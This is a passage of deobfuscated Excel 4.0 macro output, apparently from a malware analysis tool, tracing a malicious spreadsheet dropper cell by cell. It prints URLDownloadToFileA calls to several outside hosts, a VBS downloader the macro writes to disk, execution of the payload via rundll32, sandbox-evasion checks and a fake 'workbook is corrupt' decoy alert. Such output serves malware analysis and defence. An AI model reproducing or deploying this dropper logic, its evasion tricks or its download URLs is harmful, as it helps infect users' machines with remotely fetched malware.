  277. CELL:HO38099 , PartialEvaluation , FSIZE("FOPEN(""C:\Users\Public\rVuj5bF.html"")")
  278. CELL:HO38100 , PartialEvaluation , FCLOSE("FOPEN(""C:\Users\Public\rVuj5bF.html"")")
  279. CELL:HO38101 , FullEvaluation , IF(R38099C223<40000,,GOTO(R38104C223))
  280. CELL:HO38102 , FullEvaluation , "https://procacardenla.ga/wp-keys.php"
  281. CELL:HO38103 , FullEvaluation , CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"https://procacardenla.ga/wp-keys.php","C:\Users\Public\rVuj5bF.html",0,0)
  282. CELL:HO38104 , FullEvaluation , "The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt."
  283. CELL:HO38105 , PartialEvaluation , ALERT("The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.")
  284. CELL:HO38089 , FullEvaluation , [FALSE]
  285. CELL:HO38090 , PartialEvaluation , FOPEN("C:\Users\Public\rVuj5bF.html")
  286. CELL:HO38091 , PartialEvaluation , FSIZE("FOPEN(""C:\Users\Public\rVuj5bF.html"")")
  287. CELL:HO38092 , PartialEvaluation , FCLOSE("FOPEN(""C:\Users\Public\rVuj5bF.html"")")
  288. CELL:HO38093 , FullEvaluation , IF(R38091C223<40000,,GOTO(R38104C223))
  289. CELL:HO38094 , FullEvaluation , "https://datalibacbi.ml/wp-keys.php"
  290. CELL:HO38095 , FullEvaluation , CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"https://datalibacbi.ml/wp-keys.php","C:\Users\Public\rVuj5bF.html",0,0)
  291. CELL:HO38096 , PartialEvaluation , FILES("C:\Users\Public\rVuj5bF.html")
  292. CELL:HO38097 , FullBranching , IF(ISERROR(R38096C223),GOTO(R38103C223),)
  293. CELL:HO38097 , FullEvaluation , [FALSE]
  294. CELL:HO38098 , PartialEvaluation , FOPEN("C:\Users\Public\rVuj5bF.html")
  295. CELL:HO38099 , PartialEvaluation , FSIZE("FOPEN(""C:\Users\Public\rVuj5bF.html"")")
  296. CELL:HO38100 , PartialEvaluation , FCLOSE("FOPEN(""C:\Users\Public\rVuj5bF.html"")")
  297. CELL:HO38101 , FullEvaluation , IF(R38099C223<40000,,GOTO(R38104C223))
  298. CELL:HO38102 , FullEvaluation , "https://procacardenla.ga/wp-keys.php"
  299. CELL:HO38103 , FullEvaluation , CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"https://procacardenla.ga/wp-keys.php","C:\Users\Public\rVuj5bF.html",0,0)
  300. CELL:HO38104 , FullEvaluation , "The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt."
  301. CELL:HO38105 , PartialEvaluation , ALERT("The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.")
  302. CELL:IE49834 , FullEvaluation , [FALSE] GOTO(R142C133)
  303. CELL:EC142 , FullEvaluation , "=""C:\Users\Public\UWvo.html"""
  304. CELL:EC143 , FullEvaluation , "=""C:\Users\Public\VEu7ojib.vbs"""
  305. CELL:EC144 , FullEvaluation , "=FOPEN(R35703C82,3)"
  306. CELL:EC145 , FullEvaluation , "=FWRITELN(R35704C82,""h8xNMAA = """"https://wireborg.com/wp-keys.php"""""")"
  307. CELL:EC146 , FullEvaluation , "=FWRITELN(R35704C82,""MG8 = """"http://zmedia.shwetech.com/wp-keys.php"""""")"
  308. CELL:EC147 , FullEvaluation , "=FWRITELN(R35704C82,""LPDuR4W = """"https://datalibacbi.ml/wp-keys.php"""""")"
  309. CELL:EC148 , FullEvaluation , "=FWRITELN(R35704C82,""MhTSF = """"https://procacardenla.ga/wp-keys.php"""""")"
  310. CELL:EC149 , FullEvaluation , "=FWRITELN(R35704C82,""PXqk = Array(h8xNMAA,MG8,LPDuR4W,MhTSF)"")"
  311. CELL:EC150 , FullEvaluation , "=FWRITELN(R35704C82,""Dim BicuZ: Set BicuZ = CreateObject(""""MSXML2.ServerXMLHTTP.6.0"""")"")"
  312. CELL:EC151 , FullEvaluation , "=FWRITELN(R35704C82,""Function WuZErsim(data):"")"
  313. CELL:EC152 , FullEvaluation , "=FWRITELN(R35704C82,""BicuZ.setOption(2) = 13056"")"
  314. CELL:EC153 , FullEvaluation , "=FWRITELN(R35704C82,""BicuZ.Open """"GET"""", data, False"")"
  315. CELL:EC154 , FullEvaluation , "=FWRITELN(R35704C82,""BicuZ.setRequestHeader """"User-Agent"""", """"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"""""")"
  316. CELL:EC155 , FullEvaluation , "=FWRITELN(R35704C82,""BicuZ.Send"")"
  317. CELL:EC156 , FullEvaluation , "=FWRITELN(R35704C82,""WuZErsim = BicuZ.Status"")"
  318. CELL:EC157 , FullEvaluation , "=FWRITELN(R35704C82,""End Function"")"
  319. CELL:EC158 , FullEvaluation , "=FWRITELN(R35704C82,""For Each LS5TrmD in PXqk"")"
  320. CELL:EC159 , FullEvaluation , "=FWRITELN(R35704C82,""If WuZErsim(LS5TrmD) = 200 Then"")"
  321. CELL:EC160 , FullEvaluation , "=FWRITELN(R35704C82,""Dim eGo: Set eGo = CreateObject(""""ADODB.Stream"""")"")"
  322. CELL:EC161 , FullEvaluation , "=FWRITELN(R35704C82,""eGo.Open"")"
  323. CELL:EC162 , FullEvaluation , "=FWRITELN(R35704C82,""eGo.Type = 1"")"
  324. CELL:EC163 , FullEvaluation , "=FWRITELN(R35704C82,""eGo.Write BicuZ.ResponseBody"")"
  325. CELL:EC164 , FullEvaluation , "=FWRITELN(R35704C82,""eGo.SaveToFile """"""&R35702C82&"""""", 2"")"
  326. CELL:EC165 , FullEvaluation , "=FWRITELN(R35704C82,""eGo.Close"")"
  327. CELL:EC166 , FullEvaluation , "=FWRITELN(R35704C82,""Exit For"")"
  328. CELL:EC167 , FullEvaluation , "=FWRITELN(R35704C82,""End If"")"
  329. CELL:EC168 , FullEvaluation , "=FWRITELN(R35704C82,""Next"")"
  330. CELL:EC169 , FullEvaluation , "=FCLOSE(R35704C82)"
  331. CELL:EC170 , FullEvaluation , "=EXEC(""explorer.exe ""&R35703C82&"""")"
  332. CELL:EC171 , FullEvaluation , "=WHILE(ISERROR(FILES(R35702C82)))"
  333. CELL:EC172 , FullEvaluation , "=WAIT(NOW()+""00:00:01"")"
  334. CELL:EC173 , FullEvaluation , "=NEXT()"
  335. CELL:EC174 , FullEvaluation , "=FILE.DELETE(R35703C82)"
  336. CELL:EC175 , FullEvaluation , "=ALERT(""The workbook cannot be opened or repaired by Microsoft Excel because it is corrupt."")"
  337. CELL:EC176 , FullEvaluation , "=""C:\Users\Public\xD9fZh.vbs"""
  338. CELL:EC177 , FullEvaluation , "=FOPEN(R35736C82,3)"
  339. CELL:EC178 , FullEvaluation , "=""rundll32.exe"""
  340. CELL:EC179 , FullEvaluation , "=R35702C82&"",DllRegisterServer"""
  341. CELL:EC180 , FullEvaluation , "=""C:\Windows\System32"""
  342. CELL:EC181 , FullEvaluation , "=FWRITELN(R35737C82,""Set H6snW = GetObject(""""new:C08AFD90-F2A1-11D1-8455-00A0C91F3880"""")"")"
  343. CELL:EC182 , FullEvaluation , "=FWRITELN(R35737C82,""H6snW.Document.Application.ShellExecute """"""&R35738C82&"""""",""""""&R35739C82&"""""",""""""&R35740C82&"""""",Null,0"")"
  344. CELL:EC183 , FullEvaluation , "=FCLOSE(R35737C82)"
  345. CELL:EC184 , FullEvaluation , "=EXEC(""explorer.exe ""&R35736C82&"""")"
  346. CELL:EC185 , FullEvaluation , "=GOTO(R49803C239)"
  347. CELL:EC186 , FullEvaluation , GOTO(jdOsRgCP7ufKCKrN6H!_________)
  348. CELL:HE8688 , FullEvaluation , FORMULA("=FORMULA(R[-8547]C[-80],R[27013]C[-131])",jdOsRgCP7ufKCKrN6H$CD$35702)
  349. CELL:HE8733 , FullEvaluation , GOTO(jdOsRgCP7ufKCKrN6H!_________)
  350. CELL:HE8733 , FullEvaluation , GOTO(jdOsRgCP7ufKCKrN6H!_________)
  351. CELL:II24421 , FullEvaluation , "=CLOSE(FALSE)"
  352. CELL:II24422 , FullEvaluation , "=APP.MAXIMIZE()"
  353. CELL:II24423 , FullEvaluation , "=IF(GET.WINDOW(7),GOTO(R49803C239),)"
  354. CELL:II24424 , FullEvaluation , "=IF(GET.WINDOW(20),,GOTO(R49803C239))"
  355. CELL:II24425 , FullEvaluation , "=IF(GET.WINDOW(23)<3,GOTO(R49803C239),)"
  356. CELL:II24426 , FullEvaluation , "=IF(GET.WORKSPACE(31),GOTO(R49803C239),)"
  357. CELL:II24427 , FullEvaluation , "=IF(GET.WORKSPACE(13)<770,GOTO(R49803C239),)"
  358. CELL:II24428 , FullEvaluation , "=IF(GET.WORKSPACE(14)<390,GOTO(R49803C239),)"
  359. CELL:II24429 , FullEvaluation , "=IF(GET.WORKSPACE(19),,GOTO(R49803C239))"
  360. CELL:IE49813 , FullEvaluation , [FALSE] GOTO(R49803C239)
  361. CELL:IE49803 , End , CLOSE(FALSE)
  362. [END of Deobfuscation]